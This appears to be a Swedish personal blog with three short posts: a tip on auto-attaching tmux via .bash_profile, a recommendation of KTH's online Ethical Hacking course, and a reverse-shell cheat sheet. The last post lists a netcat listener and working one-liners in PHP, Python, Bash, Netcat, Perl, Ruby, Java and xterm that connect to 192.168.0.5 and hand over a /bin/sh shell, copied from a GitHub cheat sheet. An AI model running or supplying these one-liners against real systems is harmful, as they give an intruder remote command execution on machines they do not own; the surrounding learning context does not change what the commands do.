tmux och bashrc

Jag har haft problem med att få min tmux session att automatiskt starta när jag ansluter till servern med putty, Det hände helt enkelt ingenting.

Det jag ville skulle ske när jag loggar in är att kommandot: tmux attach-session -t shell skulle köras helt automagiskt. Det låter mig ha min ’vanliga’ session igång så att jag lätt kan logga in och fortsätta där jag var efter att jag pausat och stängt putty.

Helsmidigt, det kommandot gör är att ansluta till sessionen som heter shell, om den inte finns så skapas en ny.

Problemet är att om jag lägger in kommandot i .bashrc så körs det inte 🙁

Magin ligger i att lägga kommandor i filen .bash_profile då fungerar allt!

Lite tmux info:
https://tmuxcheatsheet.com/
http://man7.org/linux/man-pages/man1/tmux.1.html
https://thoughtbot.com/blog/a-tmux-crash-course

<TL;DR;> Lägg tmux attach-session -t shell i .bash_profile

Ethical Hacking

I samband med min kurs i Ethical Hacking fick jag frågan om jag vill berätta om den, nedan kan du se vad jag tyckte.

Jag kan varmt rekommendera KTH’s distanskurs i Ethical Hacking (7.5hp), mycket bra kurs om du har intresse och vill få en bra grund att bygga vidare på, eller om du bara vill veta mer så att du kan säkra upp ditt online-liv.

Här finns information om kursen: https://www.kth.se/nse/studies/online-course-in-ethical-hacking-7-5-hp

Länk till artikeln

https://www.kth.se/nse/studies/online-course-in-ethical-hacking-7-5-hp/students/to-win-over-the-hacks-you-have-to-think-like-the-hacker-1.824598

Och som PDF

To win over the hacks, you have to think like the hacker_ _ KTH

Reverse shell

Börja med att skriva det här lokalt: nc -l -p 4444 -vvv

Och på remote sidan gör du någon av dessa

Php :

php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Python :

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash :

bash -i >& /dev/tcp/192.168.0.5/4444 0>&1

Netcat :

nc -e /bin/sh 192.168.0.5 4444

Perl :

perl -e 'use Socket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby :

ruby -rsocket -e'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java :

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.5/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm :

xterm -display 192.168.0.5:4444

Source https://github.com/ismailtasdelen/reverse-shell-cheatsheet